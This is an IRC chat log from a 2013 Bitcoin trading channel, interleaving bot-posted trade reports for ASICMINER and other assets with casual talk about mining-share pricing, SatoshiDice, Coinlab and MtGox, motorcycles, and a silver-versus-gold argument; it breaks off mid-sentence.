ass..bot.. May 16 03:21:20 [BTCTC] [TAT.ASICMINER] 21 @ 0.017769 = 0.3731 BTC [+] May 16 03:21:22 assbot doesnt evenreport mpex option excercises May 16 03:21:29 would be cool May 16 03:23:56 [BTCTC] [TAT.ASICMINER] 6 @ 0.017769 = 0.1066 BTC [+] May 16 03:23:57 ^ May 16 03:25:05 [BTCTC] [COGNITIVE] 1 @ 0.201 BTC [-] May 16 03:26:06 [HAVELOCK] [VTX] 4 @ 0.4201 = 1.6804 BTC [-] May 16 03:26:08 [HAVELOCK] [VTX] 19 @ 0.42 = 7.98 BTC [-] May 16 03:26:09 [BTCTC] [TAT.ASICMINER] 13 @ 0.017769 = 0.231 BTC [+] May 16 03:26:59 [BTCTC] [COGNITIVE] 1 @ 0.2 BTC [-] May 16 03:28:06 [HAVELOCK] [ASICM] 5 @ 0.0178 = 0.089 BTC [-] May 16 03:28:08 [HAVELOCK] [ASICM] 3 @ 0.0177 = 0.0531 BTC [-] May 16 03:28:30 [BTCTC] [COGNITIVE] 2 @ 0.2 = 0.4 BTC [-] May 16 03:30:53 [BTCTC] [COGNITIVE] 1 @ 0.2 BTC [-] May 16 03:32:19 [BTCTC] [TAT.ASICMINER] 6 @ 0.017769 = 0.1066 BTC [+] May 16 03:33:14 [BTCTC] [COGNITIVE] 5 @ 0.2 = 1 BTC [-] May 16 03:34:06 [HAVELOCK] [ASICM] 5 @ 0.0177001 = 0.0885 BTC [+] May 16 03:34:08 [HAVELOCK] [ASICM] 294 @ 0.0177 = 5.2038 BTC [-] May 16 03:34:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.017769 = 0.2665 BTC [+] May 16 03:37:36 [HAVELOCK] [ASICM] 5 @ 0.0177 = 0.0885 BTC [-] May 16 03:37:39 [BTCTC] [COGNITIVE] 1 @ 0.200001 BTC [+] May 16 03:38:06 [HAVELOCK] [ASICM] 50 @ 0.0176 = 0.88 BTC [-] May 16 03:39:07 [HAVELOCK] [ASICM] 54 @ 0.0177 = 0.9558 BTC [+] May 16 03:39:08 [HAVELOCK] [ASICM] 2 @ 0.01756 = 0.0351 BTC [-] May 16 03:39:10 [HAVELOCK] [ASICM] 21 @ 0.01756 = 0.3688 BTC [-] May 16 03:39:11 [HAVELOCK] [ASICM] 27 @ 0.01756 = 0.4741 BTC [-] May 16 03:39:12 [HAVELOCK] [ASICM] 8 @ 0.0171 = 0.1368 BTC [-] May 16 03:40:07 [HAVELOCK] [ASICM] 299 @ 0.0175 = 5.2325 BTC [+] May 16 03:40:08 [HAVELOCK] [ASICM] 50 @ 0.0176 = 0.88 BTC [+] May 16 03:41:07 [HAVELOCK] [ASICM] 151 @ 0.01824 = 2.7542 BTC [+] May 16 03:42:20 [BTCTC] [TAT.ASICMINER] 6 @ 0.017769 = 0.1066 BTC [+] May 16 03:45:45 [BTCTC] [TAT.ASICMINER] 8 @ 0.017769 = 0.1422 BTC [+] May 16 03:49:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.017769 = 0.0355 BTC [+] May 16 03:50:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.017769 = 0.0355 BTC [+] May 16 03:52:07 [HAVELOCK] [ASICM] 28 @ 0.01809999 = 0.5068 BTC [-] May 16 03:54:07 [HAVELOCK] [ASICM] 26 @ 0.01809999 = 0.4706 BTC [-] May 16 03:57:07 [HAVELOCK] [ASICM] 195 @ 0.01809999 = 3.5295 BTC [-] May 16 03:58:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.0176 = 0.088 BTC [-] May 16 03:59:07 [HAVELOCK] [ASICM] 2 @ 0.0181 = 0.0362 BTC [+] May 16 04:06:35 [BTCTC] [TAT.ASICMINER] 23 @ 0.017769 = 0.4087 BTC [+] May 16 04:07:58 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [+] May 16 04:09:31 [BTCTC] [ASICMINER-PT] 1 @ 1.753001 BTC [-] May 16 04:10:21 [BTCTC] [TAT.ASICMINER] 9 @ 0.017769 = 0.1599 BTC [+] May 16 04:10:47 [BTCTC] [ASICMINER-PT] 1 @ 1.753 BTC [-] May 16 04:11:02 [BTCTC] [ASICMINER-PT] 2 @ 1.75 = 3.5 BTC [-] May 16 04:11:09 [BTCTC] [ASICMINER-PT] 1 @ 1.741 BTC [-] May 16 04:11:15 [BTCTC] [ASICMINER-PT] 1 @ 1.7401 BTC [-] May 16 04:11:20 [BTCTC] [ASICMINER-PT] 1 @ 1.74 BTC [-] May 16 04:11:43 [BTCTC] [TAT.ASICMINER] 4 @ 0.017411 = 0.0696 BTC [-] May 16 04:11:45 [BTCTC] [ASICMINER-PT] 11 @ 1.74 = 19.14 BTC [-] May 16 04:12:06 [HAVELOCK] [ASICM] 54 @ 0.0179 = 0.9666 BTC [-] May 16 04:12:24 [BTCTC] [TAT.ASICMINER] 11 @ 0.017 = 0.187 BTC [-] May 16 04:13:30 [BTCTC] [ASICMINER-PT] 3 @ 1.78 = 5.34 BTC [+] May 16 04:13:38 [BTCTC] [TAT.ASICMINER] 30 @ 0.017 = 0.51 BTC [-] May 16 04:14:59 [BTCTC] [TAT.ASICMINER] 50 @ 0.017 = 0.85 BTC [-] May 16 04:16:30 [BTCTC] [TAT.ASICMINER] 60 @ 0.017769 = 1.0661 BTC [+] May 16 04:16:45 [BTCTC] [ASICMINER-PT] 1 @ 1.779999 BTC [-] May 16 04:17:07 [HAVELOCK] [ASICM] 10 @ 0.01809999 = 0.181 BTC [+] May 16 04:18:08 [HAVELOCK] [ASICM] 42 @ 0.0179 = 0.7518 BTC [-] May 16 04:18:08 [HAVELOCK] [ASICM] 15 @ 0.0179 = 0.2685 BTC [-] May 16 04:18:10 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [+] May 16 04:18:35 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [+] May 16 04:19:29 [BTCTC] [ASICMINER-PT] 14 @ 1.779999 = 24.92 BTC [-] May 16 04:19:53 [BTCTC] [S.DICE-PT] 1 @ 0.00357 BTC [-] May 16 04:20:35 [BTCTC] [TAT.ASICMINER] 68 @ 0.017769 = 1.2083 BTC [+] May 16 04:20:48 [BTCTC] [TAT.ASICMINER] 11 @ 0.017769 = 0.1955 BTC [+] May 16 04:20:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.017769 BTC [+] May 16 04:28:10 [BTCTC] [S.MPOE-PT] 2 @ 0.000666 = 0.0013 BTC [+] May 16 04:28:36 [BTCTC] [BTC-BOND] 1 @ 0.010098 BTC [+] May 16 04:28:59 [BTCTC] [TAT.ASICMINER] 36 @ 0.0177 = 0.6372 BTC [-] May 16 04:29:01 [BTCTC] [ASICMINER-PT] 1 @ 1.77 BTC [-] May 16 04:29:08 [HAVELOCK] [ASICM] 1 @ 0.01750001 BTC [-] May 16 04:30:07 [HAVELOCK] [ASICM] 65 @ 0.01750001 = 1.1375 BTC [-] May 16 04:30:41 [BTCTC] [TAT.ASICMINER] 21 @ 0.0177 = 0.3717 BTC [-] May 16 04:32:41 [BTCTC] [ASICMINER-PT] 4 @ 1.77 = 7.08 BTC [-] May 16 04:37:22 [BTCTC] [ASICMINER-PT] 5 @ 1.765 = 8.825 BTC [-] May 16 04:39:11 [BTCTC] [TAT.ASICMINER] 133 @ 0.017685 = 2.3521 BTC [-] May 16 04:40:04 [BTCTC] [TAT.ASICMINER] 111 @ 0.017685 = 1.963 BTC [-] May 16 04:40:06 [BTCTC] [ASICMINER-PT] 1 @ 1.755 BTC [-] May 16 04:40:08 [HAVELOCK] [ASICM] 6 @ 0.0182 = 0.1092 BTC [+] May 16 04:40:11 [BTCTC] [ASICMINER-PT] 27 @ 1.75 = 47.25 BTC [-] May 16 04:41:40 [BTCTC] [S.MPOE-PT] 1 @ 0.000651 BTC [-] May 16 04:41:45 [BTCTC] [S.MPOE-PT] 1 @ 0.00065 BTC [-] May 16 04:42:07 [HAVELOCK] [ASICM] 5 @ 0.0182 = 0.091 BTC [+] May 16 04:42:56 [BTCTC] [TAT.ASICMINER] 63 @ 0.017685 = 1.1142 BTC [-] May 16 04:44:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.0177 BTC [+] May 16 04:45:23 oh man that girl May 16 04:45:45 "the obvious approach would be to increase the available drama and distributed lulz" May 16 04:47:17 you know what bugs the shit out of me May 16 04:47:37 do tell May 16 04:47:39 when i place an ask on BTCTC at the same price as someone else May 16 04:47:43 and they lower theirs May 16 04:47:52 idiots May 16 04:48:19 well you are trading mining shares May 16 04:49:22 you made that bed bud. time to sleep in it. with the morons. May 16 04:49:28 hehe May 16 04:50:32 [BTCTC] [ASICMINER-PT] 1 @ 1.76 BTC [+] May 16 04:50:54 that guy just paid a .01 idiot tax May 16 04:51:07 [HAVELOCK] [HIM] 5 @ 1.981 = 9.905 BTC [-] May 16 04:53:08 [HAVELOCK] [ASICM] 4 @ 0.01819 = 0.0728 BTC [-] May 16 04:53:09 [HAVELOCK] [ASICM] 366 @ 0.01819 = 6.6575 BTC [-] May 16 04:53:11 [HAVELOCK] [ASICM] 15 @ 0.01819 = 0.2729 BTC [-] May 16 04:54:03 [BTCTC] [ASICMINER-PT] 1 @ 1.76 BTC [+] May 16 04:54:07 [HAVELOCK] [ASICM] 25 @ 0.01819 = 0.4548 BTC [-] May 16 04:54:08 [HAVELOCK] [ASICM] 101 @ 0.01819 = 1.8372 BTC [-] May 16 04:54:09 [HAVELOCK] [ASICM] 34 @ 0.01819 = 0.6185 BTC [-] May 16 04:54:30 who knows man who knows May 16 04:54:41 the flipside of that is that you asked too much May 16 04:55:18 nah it's been happening all day May 16 04:55:30 like i'm in a bitcoin twilight zone May 16 04:56:00 [BTCTC] [TAT.ASICMINER] 41 @ 0.0177 = 0.7257 BTC [+] May 16 04:56:02 market seems to think your asks are high May 16 04:56:07 [HAVELOCK] [ASICM] 156 @ 0.0182 = 2.8392 BTC [+] May 16 04:56:09 [HAVELOCK] [ASICM] 25 @ 0.01819 = 0.4548 BTC [-] May 16 04:56:10 [HAVELOCK] [ASICM] 40 @ 0.01819 = 0.7276 BTC [-] May 16 04:56:17 you are misunderstanding May 16 04:56:18 and it can remain irrational for longer than you can remain solvent, to quote an old fart May 16 04:56:28 when you place an ask at the same price on BTCTC May 16 04:56:35 it respects the older ask first May 16 04:56:40 when someone buys it May 16 04:56:50 so when I place at same price May 16 04:56:58 and they lower theirs in response May 16 04:57:02 they are an idiot May 16 04:57:04 beautiful May 16 04:57:06 [BTCTC] [S.DICE-PT] 12 @ 0.00357 = 0.0428 BTC [-] May 16 04:57:08 [HAVELOCK] [ASICM] 5 @ 0.018 = 0.09 BTC [-] May 16 04:57:25 how are you planning to take all of their money to teach them a lesson? May 16 04:57:41 buy low, sell high May 16 04:57:56 boooring May 16 04:58:00 its not a big deal to me May 16 04:58:06 financially May 16 04:58:13 its the pet peeve aspect May 16 04:58:24 of watching someone punch themselves in the face May 16 04:58:36 [ASICM] 156 @ 0.0182 = 2.8392 BTC [+] wow is that a high? May 16 04:58:47 .0199 earlier :) May 16 04:58:51 damn May 16 05:00:16 i think i will sell some more at 2 btc each, but i think we will hit 2.5 May 16 05:00:20 and maybe more at this rate May 16 05:00:50 my feeling from sales this week May 16 05:01:00 is that 2.5 can't happen without another div like this May 16 05:01:06 usb sticks are going to be crazy profitable May 16 05:01:21 sell for $220 cost $8 May 16 05:01:27 i anticipate friedcat's next post May 16 05:01:29 thats for sure May 16 05:01:36 totally not a scam, right? May 16 05:01:40 totally not a scam. May 16 05:01:46 asic miner? May 16 05:01:53 they have 20% of the network for sure May 16 05:02:01 they are selling real asic mining hard ware for sure May 16 05:02:17 will they reach 1,000 th this year? not sure May 16 05:02:18 "real" May 16 05:02:24 as in turns electricity into hashes May 16 05:02:36 is it even remotely economical? May 16 05:02:40 yes they do sell hardware that does that, they also mine themselves May 16 05:02:48 asics are the best things out there May 16 05:02:58 benkay how long have you been around btc land? May 16 05:03:07 [HAVELOCK] [ASICM] 1800 @ 0.01765 = 31.77 BTC [-] May 16 05:03:13 [BTCTC] [TAT.ASICMINER] 11 @ 0.0177 = 0.1947 BTC [+] May 16 05:03:32 like maybe a week May 16 05:03:33 percent of the network and hw sales is all that matters May 16 05:03:36 i have 2 bitcoins May 16 05:03:40 no th May 16 05:03:44 not May 16 05:03:44 why won't you let me trade on mpex? May 16 05:03:46 okay, how did you find this chan? May 16 05:03:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.0177 BTC [+] May 16 05:04:03 why would you want to trade on mpex? May 16 05:04:07 [HAVELOCK] [HIM] 2 @ 1.981 = 3.962 BTC [-] May 16 05:04:22 to short the coins, duh May 16 05:04:25 benkay is trolling May 16 05:04:32 i see May 16 05:04:33 hey man May 16 05:04:35 [BTCTC] [ASICMINER-PT] 1 @ 1.75 BTC [-] May 16 05:05:12 the question that i'm asking is whether the investment in the chips pays off. ever. May 16 05:05:21 most of thje time the truly ignorant cant find this chan May 16 05:05:31 i know! May 16 05:05:35 how the fuck did i make it in here May 16 05:05:37 benkay your question is odd May 16 05:05:39 [BTCTC] [S.DICE-PT] 52 @ 0.00357 = 0.1856 BTC [-] May 16 05:05:41 i dont understand May 16 05:05:50 benkay they have paid out like 4005 of money invested, if you mean should you buy from them at 50 btc each? dont know May 16 05:05:58 the usb sticks, you might make some money in 2 years.... May 16 05:06:01 that's what i'm talking about, c-n May 16 05:06:08 oh May 16 05:06:09 is making pennies economical? May 16 05:06:10 hardware sales themselves as scam May 16 05:06:11 400% May 16 05:06:19 this is whats going on with the hardware May 16 05:06:19 fuck no May 16 05:06:25 i can explain it two ways May 16 05:06:28 benkey sorry but im going to ignore you, i think you are trolling May 16 05:06:41 nono my trolls are obvious May 16 05:06:51 1. AM sells hardware at whatever price the market will bear. Stop trying to rationalize it further. May 16 05:06:54 i have yet to see a tvom approach to mining hardware roi analysis May 16 05:07:34 duh, they'd be horrible at their core business otherwise May 16 05:07:36 2. AM is pricing hardware at the exact price to where it becomes questionable as to whether a buyer should buy it, thus AM is posing less of a risk to it's own mining op May 16 05:08:07 it's a great biz-move May 16 05:08:19 but admittedly, May 16 05:08:24 like you said May 16 05:08:27 moron miners May 16 05:08:31 paying moron prices May 16 05:08:43 for asicminer shares :D:D:D:D May 16 05:09:01 thats remains to be seen May 16 05:09:11 TAT, short version: "Most are ignorant of difficulty increase. Most see current generation. Most buy based on current generation." May 16 05:09:12 while they are certainly a risk at these prices May 16 05:09:44 Friedcat has demonstrated May 16 05:09:53 and he will continue to do so May 16 05:09:58 as long as he cares too May 16 05:10:03 or the world will let him May 16 05:10:09 [HAVELOCK] [ASICM] 2 @ 0.01839999 = 0.0368 BTC [+] May 16 05:10:49 it's an interesting distraction for the rest of the world, i'm sure May 16 05:10:52 if SDICE had a shade of AM's business sense, they'd be banking just as much May 16 05:11:03 what should SD do differently? May 16 05:11:07 try May 16 05:11:24 simple as that May 16 05:11:30 i was rooting for that german to take over the bitcoin gem May 16 05:11:45 just a little a/b would go a long way in the buttcorn gambling space imho May 16 05:12:06 sdice left millions on the table May 16 05:12:21 sure he banked for himself May 16 05:12:26 how so? May 16 05:12:32 seriously? May 16 05:12:38 before my time May 16 05:12:42 well May 16 05:12:44 also i r idiots, come on May 16 05:13:02 it was a massively popular bitcoin business May 16 05:13:11 and place to gamble May 16 05:13:26 they have a Games button on blockchain.info May 16 05:13:32 [BTCTC] [S.DICE-PT] 333 @ 0.00358 = 1.1921 BTC [+] May 16 05:13:40 they have(had) tons of fans May 16 05:13:52 but they just let it all be May 16 05:13:55 no growth May 16 05:14:02 no marketing worth mentioning May 16 05:14:06 no new features May 16 05:14:08 no new games May 16 05:14:13 yup May 16 05:14:13 no new partnerships May 16 05:14:17 nothing May 16 05:14:23 just waiting for the next competitor to come along and break their knees May 16 05:14:26 its insulting to investors May 16 05:14:38 [BTCTC] [TAT.ASICMINER] 15 @ 0.0177 = 0.2655 BTC [+] May 16 05:14:40 and why i sold 130,000 shares May 16 05:14:43 it's kind of what you get for investing in accidental successes. May 16 05:15:09 such are rarely piloted by humans capable of building companies that continue to grow May 16 05:15:28 and i get the sense SD was built by someone who wanted to build a buttcorn generating machine May 16 05:15:44 and didn't actually care about, you know, building, establishing and growing a real company. May 16 05:16:05 but i r idiots as we all know May 16 05:16:07 [HAVELOCK] [ASICM] 110 @ 0.018 = 1.98 BTC [-] May 16 05:16:09 [HAVELOCK] [ASICM] 390 @ 0.01795 = 7.0005 BTC [-] May 16 05:16:10 [HAVELOCK] [ASICM] 20 @ 0.0178 = 0.356 BTC [-] May 16 05:16:34 well as you can see, i agree May 16 05:16:42 he and mp banked on the ipo May 16 05:16:47 banked on the 3 tranches May 16 05:16:50 and peaced out May 16 05:16:56 a well executed hustle May 16 05:17:08 [HAVELOCK] [ASICM] 30 @ 0.0178 = 0.534 BTC [-] May 16 05:17:11 http://powersports.honda.com/assets/flash/model/gallery/CBR250R_2013_01.jpg i bought the white one yesterday :) May 16 05:17:38 i like the orange better May 16 05:17:42 [BTCTC] [TAT.ASICMINER] 6 @ 0.0177 = 0.1062 BTC [+] May 16 05:17:48 but i also like my life too much to ride one of those May 16 05:17:54 they only had the white one in the store, it was that or wait May 16 05:18:17 also honestly iv never seen the orange on for sale in thailand and dont think they do May 16 05:18:28 wife says i cant drive the racing bike drunk :( May 16 05:18:34 you bette rnot May 16 05:18:39 an hero May 16 05:18:41 I'd have wanted the black. I love black stuff May 16 05:19:03 >.> May 16 05:19:36 wife wanted the red one, son wanted black, but i really did not care and they had a white one May 16 05:19:41 had to wait at least a month for the others May 16 05:20:56 3rd world problems? May 16 05:21:46 :) May 16 05:22:06 thailand (unless you are a farmer) is not 3rd world May 16 05:22:21 your stores are out of motorcycles May 16 05:22:24 i beg to disagree May 16 05:22:36 [MPEX] [S.MPOE] 9500 @ 0.00066912 = 6.3566 BTC [+] May 16 05:22:40 just that style May 16 05:23:01 hey you guise May 16 05:23:04 i got moar things May 16 05:23:08 [HAVELOCK] [ASICM] 66 @ 0.01829999 = 1.2078 BTC [+] May 16 05:23:12 they are honestly reasonable prices, that bike was only 4,000$ May 16 05:23:22 let's talk about how much i spent on them May 16 05:23:25 the ducati i wanted was $30,000 May 16 05:23:32 those are nice bikes May 16 05:23:43 still only half a week of your AM div May 16 05:23:58 Back from the startup mixer May 16 05:23:59 [BTCTC] [BTC-BOND] 1 @ 0.010098 BTC [+] May 16 05:24:07 [HAVELOCK] [ASICM] 43 @ 0.01829999 = 0.7869 BTC [+] May 16 05:24:08 im only going to be here likle 2 months so seemed silly to buy one, esp since it would take a month to get it here May 16 05:24:21 Met with a coinlab rep May 16 05:24:27 how did that go? May 16 05:24:31 [BTCTC] [GSDPT] 3 @ 0.003179 = 0.0095 BTC [+] May 16 05:24:32 The main coinlab team pulled out May 16 05:24:32 [BTCTC] [ASICMINER-PT] 1 @ 1.74 BTC [-] May 16 05:24:39 [BTCTC] [ASICMINER-PT] 1 @ 1.73 BTC [-] May 16 05:24:41 [BTCTC] [GSDPT] 3 @ 0.00331 = 0.0099 BTC [+] May 16 05:24:44 but one girl showed up to rep them May 16 05:24:46 check it May 16 05:24:47 [BTCTC] [ASICMINER-PT] 1 @ 1.72 BTC [-] May 16 05:24:49 [BTCTC] [GSDPT] 39 @ 0.00332 = 0.1295 BTC [+] May 16 05:24:55 [BTCTC] [ASICMINER-PT] 2 @ 1.71 = 3.42 BTC [-] May 16 05:24:55 piiiics May 16 05:24:57 [BTCTC] [GSDPT] 69 @ 0.003395 = 0.2343 BTC [+] May 16 05:25:03 [BTCTC] [ASICMINER-PT] 6 @ 1.7 = 10.2 BTC [-] May 16 05:25:04 i already had my motorcycle .2 wrecks and 3 friends in wrecks . no more May 16 05:25:05 [BTCTC] [GSDPT] 71 @ 0.0034 = 0.2414 BTC [+] May 16 05:25:08 cool May 16 05:25:16 [BTCTC] [GSDPT] 44 @ 0.00344 = 0.1514 BTC [+] May 16 05:25:16 https://twitter.com/AndrewHires/status/334830572771885056/photo/1 May 16 05:25:47 She pitched me on their strategy May 16 05:25:48 I wish I could go back in time. Put everything in AM. May 16 05:25:50 Bug, you look very happy with yourself May 16 05:25:53 hehe May 16 05:26:06 They are super focused May 16 05:26:10 on three projects May 16 05:26:13 the HPC May 16 05:26:14 I'd have gotten like 40k USD for last weeks' dividend... May 16 05:26:17 The exchange May 16 05:26:23 i need to get a pr girl like that... May 16 05:26:32 and I forget the 3rd one May 16 05:26:51 namworld should not have sold all at .4 :( May 16 05:26:52 so do you think they'll actually end up doing something worth doing? May 16 05:26:53 I gave her a hard time about the 'exchange'.... May 16 05:27:12 Yeah, well what I sold wasn't that much... May 16 05:27:19 [BTCTC] [ASICMINER-PT] 1 @ 1.755 BTC [+] May 16 05:27:19 Then she said their real target is high net worth individuals May 16 05:27:22 moving that money around May 16 05:27:31 cool May 16 05:27:35 that is more or less on their website May 16 05:27:39 that helps everyone May 16 05:27:45 getting big money in May 16 05:27:48 So I told her that I wanted to pull out 5000 BTC into cash, how can I do that with them May 16 05:28:05 I am worried about MtGox blah blah blah May 16 05:28:11 good man May 16 05:28:13 bug dsont use them, they will make you pay takes and what not May 16 05:28:22 taxes * May 16 05:28:24 Chaaang-Noi: gotta pay taxes anyway May 16 05:28:56 She said there is one person that handles all the High Net clients personallly, holds their hand thru the process. May 16 05:28:58 yes and no, i have just been selling my coins at $3.20 each... ($1 silver eagle coins) May 16 05:29:07 [HAVELOCK] [ASICM] 1 @ 0.01829999 BTC [+] May 16 05:29:21 love how silver coins have a fiat face value of $1 :) May 16 05:29:30 Then I pressed on it... I AM actually interested May 16 05:29:39 mhm May 16 05:29:45 keep talking like this i like it May 16 05:29:47 She says they aren't going to move any money until they settle the lawsuit May 16 05:29:56 :sad trombone: May 16 05:30:03 bug, that could take ages :( May 16 05:30:05 Everything is actually on hold till they settle May 16 05:30:06 Nah May 16 05:30:12 I think the will settle it quick May 16 05:30:15 just as I suspected May 16 05:30:23 could be longer with this DHS shit now no? May 16 05:30:25 It's their alternative to a down round of funding May 16 05:30:31 quick and gox dont really go together May 16 05:30:34 ThickAsThieves: Hmm.... maybe May 16 05:30:46 i have a hunch that the DHS is a function of good lawyering on some SV companies' behalf May 16 05:30:47 Chaaang-Noi: It all depends on the cost May 16 05:30:55 benkay: totally May 16 05:31:05 gox is too stupid to do what is best for it and its customers May 16 05:31:14 there are a TON of hush mode startups in bitcoin right now May 16 05:31:15 people who claim the us isn't like other relationship-based countries just don't get it May 16 05:31:20 im pretty sure gox will fuck this up some how May 16 05:31:33 [HAVELOCK] [ASICM] 100 @ 0.01829999 = 1.83 BTC [+] May 16 05:31:38 I had a VC contact me today May 16 05:31:48 why? May 16 05:31:53 a manager at Zynga May 16 05:32:04 wanted me to hook him up with Friedcat May 16 05:32:13 wait are they a manager at a shit facebook company or a venture capitalist? May 16 05:32:19 both May 16 05:32:22 zynga is a mile from me May 16 05:32:31 i dont know if he was representing Zynga though May 16 05:32:31 oh yeah, people have been contacting me as well to get to friedcat, May 16 05:32:49 people have been trying to make deals off the table with me for friedcat, i just lol at them May 16 05:32:57 yeah May 16 05:33:04 [BTCTC] [BTC-BOND] 1 @ 0.010098 BTC [+] May 16 05:33:12 he told me i would be (lemme look it up) May 16 05:33:19 im like lol talk to him directly but he will jsut ignore you May 16 05:33:46 thats what i said May 16 05:33:49 and he said May 16 05:33:52 "thank you for getting back to me so fast. i'm looking for someone to broker an introduction and start us off on the right foot, that i could then generously thank in return." May 16 05:34:01 it was this guy May 16 05:34:02 http://www.linkedin.com/in/andrewartz May 16 05:34:10 he's probly reading us now May 16 05:34:13 and all mad at me May 16 05:34:17 yeah these guys are willing to pay just to get friedcat to respond May 16 05:34:37 one russian guy was the craziest, he thought he could buy at like 10% of going market rate May 16 05:35:22 it was interesting and unexpected nonetheless May 16 05:35:46 who here has paypal? is it easy to set up? do i need my bank info? May 16 05:36:33 set mine up ages ago May 16 05:36:35 dunno May 16 05:38:20 it seems to be an option for selling btc May 16 05:38:43 ironiccly i started using btc cuz i hated paypal and banks, now i use them more than evar :( May 16 05:39:24 but cant tx be reversed? May 16 05:39:40 http://www.apmex.com/Product/72462/2013_Silver_Eagle_500_Coin_Monster_Box_SF_Mint_Sealed.aspx anyone want to sell me one of these? 130 btc for $500! May 16 05:41:38 tx can be reversed for 1-3 months May 16 05:41:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0177 BTC [+] May 16 05:41:57 [BTCTC] [TAT.ASICMINER] 14 @ 0.0177 = 0.2478 BTC [+] May 16 05:42:11 i was going to use someone i trusted May 16 05:42:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0177 BTC [+] May 16 05:42:34 and in small amounts, and just for some stuff to buy off of ebay May 16 05:42:38 Only $4.49 per coin over spot! May 16 05:42:41 jesus May 16 05:42:44 what a fucking ripoff May 16 05:42:45 Paypal's a bitch, but that bitch can go anywhere. And claw back visciously your money when you ask her. May 16 05:42:52 bug, it was $8 May 16 05:43:07 $14000 May 16 05:43:15 and also bug, you can sell them back for over spot May 16 05:43:33 silver bars are cool, but its not legal tendar :( May 16 05:43:41 people are so desperate for silver coins that they will pay 20% over price? May 16 05:43:46 so stupid May 16 05:44:01 they only market is the deranged May 16 05:44:05 bug they sell rounds for $1 over spot May 16 05:44:09 metals are collapsing May 16 05:44:10 ill link you hold on May 16 05:44:16 I don't need a link May 16 05:44:18 I'm not buying May 16 05:44:21 okay May 16 05:44:36 yeah metals are going down, but i want to buy as they go down, i think long term silver is solid May 16 05:45:02 im getting into silver cuz 100% in crypto is not really smart since i have to support a family May 16 05:45:12 and whores May 16 05:45:24 only their coke habbits May 16 05:46:09 im getting to damn old, have a bit of a hang over from last night and i did not drink that much :/ May 16 05:46:19 to be 18 again... May 16 05:46:29 silver is abundant. people have been trying to sell it as worthwhile and "an investment" or "money" since the great debates in the us in the 1800s May 16 05:46:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.01726 BTC [-] May 16 05:46:36 but on the face of it silver is a sort of tin. May 16 05:46:55 people ahve been trying to sell silver as money since 60000 years ago.... May 16 05:47:05 fuck 6000 May 16 05:47:08 [HAVELOCK] [ASICM] 200 @ 0.0177 = 3.54 BTC [-] May 16 05:47:37 silver and gold is the oldest form of money we still use May 16 05:48:07 i hold silver in the usa and gold here in thailand as a shtf backup and not a large percent of my assets just 5 to 10% May 16 05:48:07 [HAVELOCK] [ASICM] 100 @ 0.0179 = 1.79 BTC [+] May 16 05:48:30 a long shot, but does anyone here know what floating point representation btc-e uses? May 16 05:48:32 i think every person should ahve some physical silver and gold just incase May 16 05:49:05 in case we need to melt it down for a spear and arrows? May 16 05:49:10 dont know, sorry $litecoin might have a better shot of knowing May 16 05:49:11 pew pew May 16 05:49:13 [BTCTC] [BTC-BOND] 1 @ 0.010098 BTC [+] May 16 05:49:14 #litecoin May 16 05:49:48 if you are trapped in a nationstate that prints their money to worthlessness you will need silver and gold May 16 05:50:09 it happens... May 16 05:50:37 its something you hope you never have to use, but if you do need it, you will be glad as fuck you have it May 16 05:51:13 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 16 05:51:16 [BTCTC] [ASICMINER-PT] 1 @ 1.76 BTC [+] May 16 05:51:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.01764 BTC [+] May 16 05:51:55 you guys going to celibrate pizza day? may 22nd? May 16 05:52:00 silver never was money. May 16 05:52:08 [HAVELOCK] [SDICE] 5 @ 0.2511 = 1.2555 BTC [+] May 16 05:52:12 gold is money. silver is this thing that poor people keep tryiong to pass as money May 16 05:52:13 i have a roman coin that sure looks like money May 16 05:52:23 ya well, romans ran scams too. May 16 05:52:38 [BTCTC] [ASICMINER-PT] 2 @ 1.4 = 2.8 BTC [-] May 16 05:52:42 gold is money silver is a scam is like saying btc is money and ltc is a scam :) May 16 05:53:16 look. there's more than 100x as much silver available as gold. for every 6 dollars or so that silver goes up in price the production capacity doubles May 16 05:53:25 it's just not scarce. what else is there ? May 16 05:53:52 it goes from 5 to 50 and back and again with the folly of the crowds, over the decades and centuries. May 16 05:53:52 not above ground, its about equal, and under ground its about 1/16 ratio May 16 05:53:54 [BTCTC] [ASICMINER-PT] 2 @ 1.7 = 3.4 BTC [+] May 16 05:53:58 where did you get this 100x? May 16 05:54:13 [BTCTC] [TAT.ASICMINER] 49 @ 0.01764 = 0.8644 BTC [+] May 16 05:54:29 i bought most my silver at $7 and yeah i think its high May 16 05:54:42 i sold much of it at $35 years ago and bought btc May 16 05:54:52 just buying some back in, more than i ever had really May 16 05:55:06 buying metals never made sense to me May 16 05:55:08 silver is not perfect but its smart to have 5 to 10 % of wealth in gold silver May 16 05:55:13 listen. in 2011 alone, mexico alone produced ~4500 tonnes of the stuff. May 16 05:55:19 the world like 20k tonnes. in one year. May 16 05:55:23 [BTCTC] [ASICMINER-PT] 4 @ 1.45 = 5.8 BTC [-] May 16 05:55:25 other than when we hit recession and a bajillion We Buy Gold stores popped up May 16 05:55:27 this is like... all the gold that exists. May 16 05:55:38 and i wished i had ridden that wave May 16 05:55:45 Chaaang-Noi: the real question of our time is: how much lead one should hold. May 16 05:55:47 we use silver in industry, we just store gold... May 16 05:55:54 industry my foot. May 16 05:56:01 what, jewelry for poor but ambitious indian girls ? May 16 05:56:07 holding lead would work as well, however you get into storage issues May 16 05:56:08 that's not industry. May 16 05:56:08 werewolves man May 16 05:56:15 dont you watch True Blood? May 16 05:56:24 lol May 16 05:56:31 ThickAsThieves what amuses me the most is this "silver is valuable cause it can work as currency" nonsense. May 16 05:56:43 tell you wahjt, if i'm the boss of a tribe and i need a curtrency ima make teeth the currenyc. May 16 05:56:55 you guys, i think you are pretty ignorant about this and are not trolling, but if you are trolling you are doing a fine job :) May 16 05:56:57 you don't get proper ones till about 12 or so, and the 